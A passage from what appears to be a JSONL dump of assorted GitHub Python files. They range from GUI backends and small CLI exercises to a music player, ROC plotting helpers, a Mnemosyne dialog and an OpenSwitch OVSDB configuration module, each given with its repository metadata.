self._vispy_mouse_move(pos=(x, y), modifiers=self._mod)\n\n def _on_key_press(self, _id, key, scancode, action, mod):\n if self._vispy_canvas is None:\n return\n key, text = self._process_key(key)\n if action == glfw.GLFW_PRESS:\n fun = self._vispy_canvas.events.key_press\n down = True\n elif action == glfw.GLFW_RELEASE:\n fun = self._vispy_canvas.events.key_release\n down = False\n else:\n return\n self._process_mod(key, down=down)\n \n # NOTE: GLFW only provides localized characters via _on_key_char, so if\n # this event contains a character we store all other data and dispatch\n # it once the final unicode character is sent shortly after.\n if text != '' and action == glfw.GLFW_PRESS:\n 
self._next_key_events.append((fun, key, self._mod))\n else:\n if key in self._next_key_text:\n text = self._next_key_text[key]\n del self._next_key_text[key]\n fun(key=key, text=text, modifiers=self._mod)\n\n def _on_key_char(self, _id, text):\n # Repeat strokes (frequency configured at OS) are sent here only,\n # no regular _on_key_press events. Currently ignored!\n if len(self._next_key_events) == 0:\n return\n\n (fun, key, mod) = self._next_key_events.pop(0)\n fun(key=key, text=chr(text), modifiers=mod)\n self._next_key_text[key] = text\n\n def _process_key(self, key):\n if 32 <= key <= 127:\n return keys.Key(chr(key)), chr(key)\n elif key in KEYMAP:\n return KEYMAP[key], ''\n else:\n return None, ''\n\n def _process_mod(self, key, down):\n \"\"\"Process (possible) keyboard modifiers\n\n GLFW provides \"mod\" with many callbacks, but not (critically) the\n scroll callback, so we keep track on our own here.\n \"\"\"\n if key in MOD_KEYS:\n if down:\n if key not in self._mod:\n self._mod.append(key)\n elif key in self._mod:\n self._mod.pop(self._mod.index(key))\n return self._mod\n\n\n# ------------------------------------------------------------------- timer ---\n\nclass TimerBackend(BaseTimerBackend):\n\n def __init__(self, vispy_timer):\n BaseTimerBackend.__init__(self, vispy_timer)\n vispy_timer._app._backend._add_timer(self)\n self._vispy_stop()\n\n def _vispy_start(self, interval):\n self._interval = interval\n self._next_time = time() + self._interval\n\n def _vispy_stop(self):\n self._next_time = float('inf')\n\n def _tick(self):\n if time() >= self._next_time:\n self._vispy_timer._timeout()\n self._next_time = time() + self._interval\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/vispy_vispy/vispy-master/vispy/app/backends/_glfw.py","file_name":"_glfw.py","file_ext":"py","file_size_in_byte":16909,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"40172500655","text":"\ndef input_choice():\n print('0. Exit')\n print('1. Add user')\n print('2. Remove user')\n print('3. 
List users')\n\n    return input('Choose a choice: ')\n\n\ndef add_user(users):\n    user = input('Enter user: ')\n    users.append(user)\n    print(f'Added {user}')\n\ndef remove_user(users):\n    user = input('Enter user: ')\n    if user in users:\n        users.remove(user)\n    else:\n        print(f'{user} not found')\n\ndef list_users(users):\n    if len(users) == 0:\n        print('No users')\n    else:\n        sorted_users = sorted(users) # renamed so the built-in list is not shadowed\n        print('List of users: ')\n        for user in sorted_users:\n            print(' - ' + user)\n\ndef read_user_from_file():\n    with open('users.txt', 'r') as file:\n        usersFromFile = file.readlines()\n        users = [user.rstrip('\\n') for user in usersFromFile]\n\n    return users\n\ndef write_user_to_file(users):\n    with open('users.txt', 'w') as file:\n        file.writelines([user + '\\n' for user in users])\n\n\n\n","repo_name":"SergLavrov/SpisokPeopleProject-File14.08","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33043481666","text":"'''\r\n    Class responsible for creating HTML file for\r\n    word_count_gen.py.\r\n'''\r\n\r\nclass MarkupParser():\r\n\r\n    ##########\r\n    ## INIT ##\r\n    ##########\r\n\r\n    '''\r\n    @desc\r\n        Initialization for MarkupParser.\r\n    @param html\r\n        String path to output html file.\r\n    @param text\r\n        String path to input txt file.\r\n    @param words_dict\r\n        Dictionary holding word counts.\r\n    @param maximum\r\n        Int current maximum count.\r\n    @param minimum\r\n        Int current minimum count.\r\n    @param length\r\n        Int number of terms to use in Tag Gen.\r\n    '''\r\n    def __init__(self, html, text, words_dict, maximum, minimum, length):\r\n        self.html = html\r\n        self.text = text\r\n        self.words_dict = dict(words_dict)\r\n        self.maximum = maximum\r\n        self.minimum = minimum\r\n        self.length = length\r\n\r\n    ##############\r\n    ## INSTANCE ##\r\n    ##############\r\n\r\n    '''\r\n    @desc\r\n        Util method for calculating the appropriate class-font size for a given count,\r\n        assuming the current max and min of the data set.\r\n    @param x\r\n        Int number of occurrences of a word.\r\n    @return\r\n        Int class-font size to use in HTML.\r\n    '''\r\n    def get_font_size(self, x):\r\n        new_max = 48 # largest font class, for the most frequent words\r\n        new_min = 11 # smallest font class, for the least frequent words\r\n        size = new_min\r\n        if not self.maximum == self.minimum:\r\n            size = (new_max - new_min)*(x - self.minimum)/(self.maximum - self.minimum) + new_min\r\n        return int(size)\r\n\r\n    '''\r\n    @desc\r\n        Creates insides of <head>\r\n    @param sample\r\n        File .html that is open.\r\n    '''\r\n    def create_head(self, sample):\r\n        css = \"http://web.cse.ohio-state.edu/software/2231/\"\r\n        css += \"web-sw2/assignments/projects/tag-cloud-generator/data/tagcloud.css\"\r\n        sample.write(\"<title>Top \" + str(self.length) + \" words in \" + self.text + \"</title>\\n\")\r\n        sample.write('<link href=\"' + css + '\" rel=\"stylesheet\" type=\"text/css\">\\n')\r\n\r\n    '''\r\n    @desc\r\n        Creates insides of <body>\r\n    @param sample\r\n        File .html that is open.\r\n    '''\r\n    def create_body(self, sample):\r\n        sample.write(\"<h2>Top \" + str(self.length) + \" words in \" + self.text + \"</h2>\\n\")\r\n        sample.write(\"<hr>\\n\")\r\n        sample.write('<div class=\"cdiv\">\\n')\r\n        sample.write('<p class=\"cbox\">\\n')\r\n        for key in self.words_dict:\r\n            font = str(self.get_font_size(self.words_dict.get(key)))\r\n            sample.write('<span class=\"f' + font + '\">' +key+ '</span>\\n')\r\n        sample.write(\"</p>\\n\")\r\n        sample.write(\"</div>\\n\")\r\n\r\n    '''\r\n    @desc\r\n        Creates .html file.\r\n    '''\r\n    def create_html(self):\r\n        with open(self.html, 'w') as sample:\r\n            sample.write(\"<html>\\n\")\r\n            sample.write(\"<head>\\n\")\r\n            self.create_head(sample)\r\n            sample.write(\"</head>\\n\")\r\n            sample.write(\"<body>\\n\")\r\n            self.create_body(sample)\r\n            sample.write(\"</body>\\n\")\r\n            sample.write(\"</html>\\n\")\r\n","repo_name":"corey-miles/Python-Projects","sub_path":"word_count_gen/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14564012781","text":"import pygame\nimport tkinter as tk\nfrom tkinter import ttk\n\nclass MusicPlayer:\n    def __init__(self):\n        # Define a list of song names and paths (raw strings keep the backslashes literal)\n        self.songs = [\n            {\"name\": \"Piano\", \"path\": r'D:\\music\\soft-piano-100-bpm-121529.mp3'},\n            {\"name\": \"Battle\", \"path\": r'D:\\music\\epic_battle_music_1-6275.mp3'},\n            {\"name\": \"Dark\", \"path\": r'D:\\music\\dark-background-sounds-52324.mp3'},\n            {\"name\": \"ANNOYING\", \"path\": r'D:\\music\\cottagecore-17463.mp3'},\n            {\"name\": \"Tata\", \"path\": r'D:\\music\\taratata-6264.mp3'},\n            {\"name\": \"Letsgo\", \"path\": r'D:\\music\\gamemusic-6082.mp3'},\n            {\"name\": \"cyber-town\", \"path\": r'D:\\music\\cyber-town-simcity-style-music-22907.mp3'},\n            {\"name\": \"rar\", \"path\": r'D:\\music\\1-soundtrack-18034.mp3'},\n            {\"name\": \"spookyy\", \"path\": r'D:\\music\\spooky-halloween-effects-with-thunder-121665.mp3'},\n            {\"name\": \"stop music\", \"path\": r'D:\\music\\infinitely-loud-silence-ils-74283.mp3'},\n            # Add more songs here\n        ]\n\n        # Initialize Pygame\n        pygame.init()\n\n        # Create the GUI window\n        self.root = tk.Tk()\n        self.root.title(\"Music Player\")\n\n        # Create the listbox to display the songs\n        self.listbox = tk.Listbox(self.root,fg=\"green\",bg=\"black\",selectbackground=\"gray\",selectforeground=\"black\")\n        self.listbox.pack()\n\n        # Populate the listbox with the song names\n        for song in self.songs:\n            self.listbox.insert(\"end\", song[\"name\"])\n\n\n        # Create a play button\n        self.play_button = tk.Button(self.root, text=\"Play\", command=self.play_song)\n        self.play_button.pack()\n\n    # Function to play the selected song\n    def play_song(self):\n        selected_song = self.listbox.get(self.listbox.curselection())\n        for song in self.songs:\n            if song[\"name\"] == selected_song:\n                pygame.mixer.music.load(song[\"path\"])\n                pygame.mixer.music.play()\n\n    # Start the GUI event loop\n    def run(self):\n        self.root.mainloop()\n","repo_name":"Doridondon25/project-snake","sub_path":"venv/ab/final/music_player.py","file_name":"music_player.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35485729883","text":"import matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom Masters.PRDrag.EvolvePRe import *\n\n\ndef ringPR(a,e,Tini):\n    Tyears=10**8.\n    TimeStep=100\n    plt.figure()\n\n    F = np.linspace(0, 2 * pi, 1000)\n    # Plotting 1\n    colours = cm.rainbow(np.linspace(0, 1, 5))\n    R1 = npr(a, e, F)\n    plt.polar(F, R1 / au, label='initial')\n    for i in range(-2,2):\n        Rfrag=10**i\n        (Data, Tmini)=PREvolve(a,e,Tyears,Tini,Rfrag)\n        T=np.size(Data[0,:])-1\n        for t in range(0,T+1):\n            RelativeAngle='isthisevenneeded'\n\n        for t in (0,4): #range(0,5)\n            Timeshow=int(T*(10**-t))\n            R1 = npr(Data[1,Timeshow], Data[2,Timeshow], F)\n            plt.polar(F,R1/au,label='Rfrag=10^%s, T=10^%s'%(i,6-t), color=colours[t])\n\n\n\n    plt.legend()\n\n    # 
plt.loglog([1,Tyears],[10**3.,10**3.], label='Km')\n\n\n plt.show()\n print('finished graphing')\n return\n\n#changeperorbit(5e9,2.5*au,0.995)\n#ringdispresion(2.1*au,0.995,10**7.,0.5e9)\nringPR(2.5 * au, 0.995, 0.5e9)\n#GraphPrEvolve(2.5*au,0.995,10**8,0.5e9)\n\n'''\n Angle=np.zeros((1,T+1))\n for t in range(0,T+1):\n Angle\n '''","repo_name":"TomMCallingham/SpaggetiAstro","sub_path":"Masters/DynamicalEvof1Disc/RingEvol.py","file_name":"RingEvol.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25150427171","text":"from setuptools import setup, find_packages\n\nimport os\nimport sys\n\nversion_file_path = os.path.join(\n\tos.path.dirname(os.path.abspath(__file__)),\n\t\"nlutestframework\",\n\t\"version.py\"\n)\n\nversion = {}\nwith open(version_file_path) as f:\n\texec(f.read(), version)\nversion = version[\"__version__\"]\n\nwith open(\"README.md\") as f:\n long_description = f.read()\n\nsetup(\n name = \"NLUTestFramework\",\n version = version,\n description = \"A framework to benchmark and compare NLU frameworks.\",\n long_description = long_description,\n long_description_content_type = \"text/markdown\",\n url = \"https://github.com/emundo/nlutestframework\",\n author = \"Tim Henkes\",\n author_email = \"emubot@e-mundo.de\",\n license = \"Apache 2.0\",\n packages = find_packages(),\n entry_points = {\n \"console_scripts\": [\n \"nlutestframework=nlutestframework.__main__:main\"\n ],\n },\n install_requires = [\n \"snips-nlu>=0.20.0,<0.21\",\n \"dialogflow>=0.7.2,<0.8\",\n \"docker>=4.1.0,<5\",\n \"requests>=2.22,<3\",\n \"matplotlib>=3.1.2,<4\",\n \"pyyaml>=5.1.2,<6\",\n \"azure-cognitiveservices-language-luis>=0.5.0,<0.6\",\n \"langcodes>=1.4.1,<2\"\n ],\n python_requires = \">=3.7, <4\",\n zip_safe = False,\n classifiers = [\n \"Development Status :: 4 - Beta\",\n\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Education\",\n \"Intended Audience :: Information Technology\",\n \"Intended Audience :: Science/Research\",\n \"Intended Audience :: Telecommunications Industry\",\n\n \"Topic :: Communications :: Chat\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n \"Topic :: Scientific/Engineering :: Human Machine Interfaces\",\n\n \"License :: OSI Approved :: Apache Software License\",\n\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\"\n ]\n)\n","repo_name":"emundo/nlutestframework","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33353573933","text":"from itertools import cycle\n\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, auc\n\n\ndef roc_from_predictions(y_score, y, title='Some extension of Receiver operating characteristic to multi-class',\n labels=None, lw=2):\n \"\"\"\n This function builds ROC curve from model predictions.\n - y_score - model class predictions (as numpy array)\n - y - one-hot encoded ground truth (as numpy array)\n - labels - class labels\n - lw - plot's line width\n \"\"\"\n\n n_classes = y.shape[1]\n\n _roc(n_classes, y_score, y, title, labels, lw)\n\n\ndef roc_from_keras_model(compiled_model, x, y,\n title='Some extension of Receiver operating characteristic to multi-class', labels=None, lw=2):\n \"\"\"\n This function builds ROC curve from the Keras 
classification model.\n - compiled_model is a keras model\n - x - dataset\n - y - one-hot encoded ground truth (as numpy array)\n - labels - class labels\n - lw - plot's line width\n \"\"\"\n\n n_classes = y.shape[1]\n y_score = compiled_model.predict(x)\n\n _roc(n_classes, y_score, y, title, labels, lw)\n\n\ndef _roc(n_classes: int, y_score, y, title: str, labels=None, lw=2):\n # Compute ROC curve and ROC area for each class\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n for i in range(n_classes):\n fpr[i], tpr[i], _ = roc_curve(y[:, i], y_score[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n\n # Compute micro-average ROC curve and ROC area\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y.ravel(), y_score.ravel())\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n\n # Plot all ROC curves\n plt.figure(1)\n\n _plot(fpr, tpr, roc_auc, n_classes, labels, title, lw)\n\n\ndef _plot(fpr, tpr, roc_auc, n_classes, labels, title, lw):\n plt.plot(fpr[\"micro\"], tpr[\"micro\"],\n label='micro-average ROC curve (area = {0:0.2f})'\n ''.format(roc_auc[\"micro\"]),\n color='deeppink', linestyle=':', linewidth=4)\n colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])\n for i, color in zip(range(n_classes), colors):\n plt.plot(fpr[i], tpr[i], color=color, lw=lw,\n label='ROC curve of class {0} (area = {1:0.2f})'\n ''.format(labels[i] if labels is not None else i, roc_auc[i]))\n\n plt.plot([0, 1], [0, 1], 'k--', lw=lw)\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title(title)\n plt.legend(loc=\"lower right\")\n plt.show()\n","repo_name":"CElabls/python-roc","sub_path":"python_roc/roc.py","file_name":"roc.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2021261019","text":"#\r\n# manage_card_types_dlg.py \r\n#\r\n\r\nfrom PyQt6 import QtCore, QtGui, QtWidgets\r\n\r\nfrom mnemosyne.libmnemosyne.gui_translator import _\r\nfrom mnemosyne.libmnemosyne.card_type import CardType\r\nfrom mnemosyne.pyqt_ui.card_type_language_list_wdgt import \\\r\n CardTypeLanguageListWdgt\r\nfrom mnemosyne.pyqt_ui.clone_card_type_dlg import CloneCardTypeDlg\r\nfrom mnemosyne.pyqt_ui.ui_manage_card_types_dlg import Ui_ManageCardTypesDlg\r\nfrom mnemosyne.pyqt_ui.edit_M_sided_card_type_dlg import EditMSidedCardTypeDlg\r\nfrom mnemosyne.libmnemosyne.ui_components.dialogs import ManageCardTypesDialog\r\n\r\n\r\nclass ManageCardTypesDlg(QtWidgets.QDialog, ManageCardTypesDialog,\r\n Ui_ManageCardTypesDlg):\r\n\r\n def __init__(self, **kwds):\r\n super().__init__(**kwds)\r\n self.setupUi(self)\r\n self.native_card_types = CardTypeLanguageListWdgt(\\\r\n parent=self.native_card_types_box,\r\n component_manager=self.component_manager)\r\n self.vertical_layout_native_card_types.insertWidget(\\\r\n 0, self.native_card_types)\r\n self.Anki_card_types = CardTypeLanguageListWdgt(\\\r\n parent=self.Anki_card_types_box,\r\n component_manager=self.component_manager)\r\n self.vertical_layout_Anki_card_types.insertWidget(\\\r\n 0, self.Anki_card_types)\r\n self.setWindowFlags(self.windowFlags() \\\r\n | QtCore.Qt.WindowType.WindowMinMaxButtonsHint)\r\n self.setWindowFlags(self.windowFlags() \\\r\n & ~ QtCore.Qt.WindowType.WindowContextHelpButtonHint)\r\n self.update()\r\n state = self.config()[\"manage_card_types_dlg_state\"]\r\n if state:\r\n self.restoreGeometry(state)\r\n\r\n def activate(self):\r\n ManageCardTypesDialog.activate(self)\r\n self.exec()\r\n\r\n def update(self):\r\n # Fill up 
native types panel.\r\n card_types = []\r\n for card_type in self.database().sorted_card_types():\r\n if not card_type.hidden_from_UI and \\\r\n not card_type.id.startswith(\"7\"):\r\n card_types.append(card_type)\r\n self.native_card_types.set_card_types(card_types)\r\n self.rename_native_card_type_button.setEnabled(False)\r\n self.delete_native_card_type_button.setEnabled(False)\r\n self.native_card_types.selectionModel().currentRowChanged.connect(\\\r\n self.activate_native_card_type)\r\n # Fill up Anki card types panel.\r\n card_types = []\r\n for card_type in self.database().sorted_card_types():\r\n if self.database().is_user_card_type(card_type) and \\\r\n not card_type.hidden_from_UI and \\\r\n card_type.id.startswith(\"7\"):\r\n card_types.append(card_type)\r\n self.Anki_card_types.set_card_types(card_types)\r\n self.edit_Anki_card_type_button.setEnabled(False)\r\n self.rename_Anki_card_type_button.setEnabled(False)\r\n self.delete_Anki_card_type_button.setEnabled(False)\r\n self.Anki_card_types.selectionModel().currentRowChanged.connect(\\\r\n self.activate_Anki_card_type)\r\n if len(card_types) == 0:\r\n self.Anki_card_types_box.hide()\r\n else:\r\n self.native_card_types_box.setTitle(_(\"Mnemosyne card types\"))\r\n\r\n def clone_card_type(self):\r\n if not self.config()[\"clone_help_shown\"]:\r\n self.main_widget().show_information(\\\r\n_(\"Here, you can make clones of existing card types. This allows you to format cards in this type independently from cards in the original type. E.g. you can make a clone of 'Vocabulary', call it 'Thai' and set a Thai font specifically for this card type without disturbing your other cards.\"))\r\n self.config()[\"clone_help_shown\"] = True\r\n dlg = CloneCardTypeDlg(parent=self, component_manager=self.component_manager)\r\n dlg.exec()\r\n self.update()\r\n\r\n def activate_native_card_type(self):\r\n self.rename_native_card_type_button.setEnabled(True)\r\n self.delete_native_card_type_button.setEnabled(True)\r\n self.edit_Anki_card_type_button.setEnabled(False)\r\n self.rename_Anki_card_type_button.setEnabled(False)\r\n self.delete_Anki_card_type_button.setEnabled(False)\r\n\r\n def activate_Anki_card_type(self):\r\n self.rename_native_card_type_button.setEnabled(False)\r\n self.delete_native_card_type_button.setEnabled(False)\r\n self.edit_Anki_card_type_button.setEnabled(True)\r\n self.rename_Anki_card_type_button.setEnabled(True)\r\n self.delete_Anki_card_type_button.setEnabled(True)\r\n\r\n def delete_native_card_type(self):\r\n self.delete_selected_card_type(\\\r\n self.native_card_types.selected_card_type())\r\n\r\n def delete_Anki_card_type(self):\r\n self.delete_selected_card_type(\\\r\n self.Anki_card_types.selected_card_type())\r\n\r\n def delete_selected_card_type(self, card_type):\r\n if not card_type:\r\n return\r\n answer = self.main_widget().show_question\\\r\n (_(\"Delete this card type?\"), _(\"&OK\"), _(\"&Cancel\"), \"\")\r\n if answer == 1: # Cancel.\r\n return\r\n self.controller().delete_card_type(card_type)\r\n self.update()\r\n\r\n def rename_native_card_type(self):\r\n self.rename_selected_card_type(\\\r\n self.native_card_types.selected_card_type())\r\n\r\n def rename_Anki_card_type(self):\r\n self.rename_selected_card_type(\\\r\n self.Anki_card_types.selected_card_type())\r\n\r\n def rename_selected_card_type(self, card_type):\r\n if not card_type:\r\n return\r\n\r\n from mnemosyne.pyqt_ui.ui_rename_card_type_dlg \\\r\n import Ui_RenameCardTypeDlg\r\n\r\n class RenameDlg(QtWidgets.QDialog, Ui_RenameCardTypeDlg):\r\n 
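            \"\"\"Small inline dialog that combines a plain QDialog with the generated Ui_RenameCardTypeDlg form; defined inside the method because it is only used here.\"\"\"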
def __init__(self, old_card_type_name):\r\n super().__init__()\r\n self.setupUi(self)\r\n self.card_type_name.setText(old_card_type_name)\r\n\r\n dlg = RenameDlg(card_type.name)\r\n if dlg.exec() == QtWidgets.QDialog.DialogCode.Accepted:\r\n new_name = dlg.card_type_name.text()\r\n self.controller().rename_card_type(card_type, new_name)\r\n self.update()\r\n\r\n def edit_Anki_card_type(self):\r\n card_type = self.Anki_card_types.selected_card_type()\r\n if not card_type:\r\n return\r\n dlg = EditMSidedCardTypeDlg(card_type,\r\n component_manager=self.component_manager)\r\n if dlg.exec() == QtWidgets.QDialog.DialogCode.Accepted:\r\n self.database().update_card_type(card_type)\r\n self.update()\r\n\r\n def _store_state(self):\r\n self.config()[\"manage_card_types_dlg_state\"] = self.saveGeometry()\r\n\r\n def closeEvent(self, event):\r\n # Generated when clicking the window's close button.\r\n self._store_state()\r\n\r\n def accept(self):\r\n self._store_state()\r\n return QtWidgets.QDialog.accept(self)\r\n\r\n def reject(self):\r\n self._store_state()\r\n return QtWidgets.QDialog.reject(self)\r\n\r\n","repo_name":"mnemosyne-proj/mnemosyne","sub_path":"mnemosyne/pyqt_ui/manage_card_types_dlg.py","file_name":"manage_card_types_dlg.py","file_ext":"py","file_size_in_byte":7084,"program_lang":"python","lang":"en","doc_type":"code","stars":443,"dataset":"github-code","pt":"21"} +{"seq_id":"5162406294","text":"#python debugger module\nimport pdb\nfirst = \"F\"\nsecond = \"S\"\npdb.set_trace()\nresult = first + second\nthird = \"T\"\nresult += third\nprint(result)\n\n# put: pdb.set_trace()\n#into line of code that is giving you an error and see which line is giving you the problem\n\n#Common PDB command:\n# l (list)\n# n (next line)\n# p (print)\n# c (continue - finished debugging and runs throug the rest of the code)\n","repo_name":"ksompura/python_training","sub_path":"debugging_and_error_handling/pdb_PythonDebuging.py","file_name":"pdb_PythonDebuging.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24945973633","text":"\ndef guessing_game()-> None:\n from random import randint\n my_guessing_value = randint(0,100)\n user_guessed = -10\n\n while user_guessed != my_guessing_value:\n user_guess_str = input((\"Guess a number between 0 and 100 -> \"))\n assert user_guess_str.isdigit() == True\n user_guessed = int(user_guess_str)\n message_str = f\"Your guess of {user_guessed} is too \"\n if user_guessed > my_guessing_value:\n print(message_str+\"high!\")\n else:\n print(message_str+\"low!\")\n\n \n print(f\"Congratulation you guessed correct!\")\n\nguessing_game()\n\n \n\n\n\n\n","repo_name":"Must-ah/Python-Exercises","sub_path":"1_Numerical_types/Exercise_1/Exercise_1_Number_guessing_game.py","file_name":"Exercise_1_Number_guessing_game.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43802585891","text":"import _read, _write\nimport ops.constants, ops.opsidl\n\nfrom ovs.db.idl import SchemaHelper, Idl, Transaction\n\nimport ovs.vlog\nvlog = ovs.vlog.Vlog('dc')\n\n\ndef register(extschema, ovsschema, ovsremote):\n \"\"\"Register interest in all configuration and index\n columns for all tables in ovsschema.\n\n Args:\n extschema (opslib.RestSchema): This is the\n parsed extended-schema (vswitch.extschema) object.\n ovsschema: OVSDB schema file\n ovsremote: OVSDB remote socket\n\n Returns:\n 
ovs.db.idl.Idl instance\n \"\"\"\n\n schema_helper = SchemaHelper(ovsschema)\n\n for tablename, tableschema in extschema.ovs_tables.iteritems():\n\n register_columns = []\n\n # configuration columns\n config_columns = [str(key) for key in tableschema.config.keys()]\n # reference columns\n reference_columns = [str(key) for key in tableschema.references.keys()]\n\n # index columns\n for item in tableschema.index_columns:\n if not item in config_columns:\n register_columns.append(str(item))\n\n register_columns += config_columns\n register_columns += reference_columns\n\n # dynamic columns\n if tableschema.dynamic:\n for key in tableschema.dynamic.keys():\n if key not in register_columns:\n register_columns.append(key)\n\n # NOTE: remove this when we have a proper\n # solution for TG-1116\n if str(tablename) == 'VLAN':\n register_columns.append('internal_usage')\n\n schema_helper.register_columns(str(tablename), register_columns)\n\n idl = ops.opsidl.OpsIdl(ovsremote, schema_helper)\n return idl\n\n\ndef read(extschema, idl):\n \"\"\"Read the OpenSwitch OVSDB database\n\n Args:\n extschema (opslib.RestSchema): This is the\n parsed extended-schema (vswitch.extschema) object.\n idl (ovs.db.idl.Idl): This is the IDL object that\n represents the OVSDB IDL.\n\n Returns:\n dict: Returns a Python dictionary object containing\n data read from all OVSDB tables and arranged according\n to the relationship between various tables as\n described in vswitch.extschema\n \"\"\"\n config = {}\n for table_name in extschema.ovs_tables.keys():\n\n # Check only root table or top level table\n if extschema.ovs_tables[table_name].parent is not None:\n continue\n\n # Get table data for root or top level table\n try:\n table_data = _read.get_table_data(table_name, extschema, idl)\n except Exception as e:\n vlog.err(e)\n return e\n\n if table_data is not None:\n config.update(table_data)\n\n # remove system uuid\n config[ops.constants.OVSDB_SCHEMA_SYSTEM_TABLE] = config[ops.constants.OVSDB_SCHEMA_SYSTEM_TABLE].values()[0]\n vlog.dbg('succcess generating running configuration')\n return config\n\ndef write(data, extschema, idl, txn=None, block=False):\n \"\"\"Write a new configuration to OpenSwitch OVSDB database\n\n Args:\n data (dict): The new configuration represented as a Python\n dictionary object.\n extschema (opslib.RestSchema): This is the\n parsed extended-schema (vswitch.extschema) object.\n idl (ovs.db.idl.Idl): This is the IDL object that\n represents the OVSDB IDL.\n txn (ovs.db.idl.Transaction): OVSDB transaction object.\n block (boolean): if block is True, commit_block() is used\n\n Returns:\n result : The result of transaction commit\n \"\"\"\n if txn is None:\n try:\n txn = Transaction(idl)\n block = True\n except AssertionError as e:\n vlog.dbg('error in creating transaction: %s' % e)\n return e\n\n # dc.read returns config db with 'System' table\n # indexed to 'System' keyword. Replace it with\n # current database's System row UUID so that all\n # tables in 'data' are represented the same way\n\n try:\n system_uuid = idl.tables[ops.constants.OVSDB_SCHEMA_SYSTEM_TABLE].rows.keys()[0]\n data[ops.constants.OVSDB_SCHEMA_SYSTEM_TABLE] = {system_uuid:data[ops.constants.OVSDB_SCHEMA_SYSTEM_TABLE]}\n\n _write.setup_validators(extschema, idl)\n\n # iterate over all top-level tables i.e. 
root\n for table_name, tableschema in extschema.ovs_tables.iteritems():\n\n # iterate over non-children tables\n if extschema.ovs_tables[table_name].parent is not None:\n continue\n\n # set up the non-child table\n _write.setup_table(table_name, data, extschema, idl, txn)\n\n # iterate over all tables to fill in references\n for table_name, tableschema in extschema.ovs_tables.iteritems():\n\n if extschema.ovs_tables[table_name].parent is not None:\n continue\n\n _write.setup_references(table_name, data, extschema, idl)\n\n validation_errors = _write.exec_validators()\n if validation_errors:\n return (txn.ERROR, validation_errors)\n\n except Exception as e:\n txn.abort()\n return (txn.ERROR, e)\n\n try:\n if not block:\n # txn maybe be incomplete\n result = txn.commit()\n else:\n # txn will block until it is completed\n result = txn.commit_block()\n vlog.dbg('transacton result: %s' % result)\n return (result, txn.get_error())\n\n except Exception as e:\n vlog.err('transaction exception: %s' % e)\n txn.abort()\n return (txn.ERROR, e)\n","repo_name":"libreswitch/restd","sub_path":"ops/dc.py","file_name":"dc.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14994393959","text":"def make_squares2(arr):\n '''\n Given a sorted array, create a new array containing\n squares of all the number of the input array in the sorted order.\n '''\n\n squares = []\n\n for el in arr:\n squares.append(abs(el * el))\n\n squares.sort()\n\n return squares\n\ndef make_squares3(arr):\n '''\n Given a sorted array, create a new array containing\n squares of all the number of the input array in the sorted order.\n '''\n\n left, right = 0, 0\n squares = []\n\n while arr[left] < 0:\n left += 1\n\n if arr[left + 1] != None:\n right = left + 1\n elif arr[left - 1] != None:\n right = left\n left -= 1\n\n while left >= 0 or right < len(arr):\n if left >= 0 and right < len(arr):\n left_sqr = arr[left] * arr[left]\n right_sqr = abs(arr[right] * arr[right])\n\n if left_sqr == right_sqr:\n squares.append(left_sqr)\n squares.append(right_sqr)\n left -= 1\n right += 1\n elif left_sqr < right_sqr:\n squares.append(left_sqr)\n left -= 1\n else:\n squares.append(right_sqr)\n right += 1\n elif left >= 0:\n squares.append(arr[left] * arr[left])\n left -= 1\n else:\n squares.append(abs(arr[right] * arr[right]))\n right += 1\n\n return squares\n\ndef make_squares(arr):\n '''\n Given a sorted array, create a new array containing\n squares of all the number of the input array in the sorted order.\n '''\n\n squares = [0 for x in range(len(arr))]\n pointer = len(arr) - 1\n left, right = 0, pointer\n\n while left <= right:\n left_square = arr[left] * arr[left]\n right_square = arr[right] * arr[right]\n\n if left_square > right_square:\n squares[pointer] = left_square\n left += 1\n else:\n squares[pointer] = right_square\n right -= 1\n\n pointer -= 1\n\n return squares\n\n# |\narray = [-2, -1, 0, 2, 3]\n# |\n\nprint(make_squares(array))","repo_name":"luckydimdim/grokking","sub_path":"two_pointers/squaring_a_sorted_array/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"36900852721","text":"# 数组查找\r\nclass 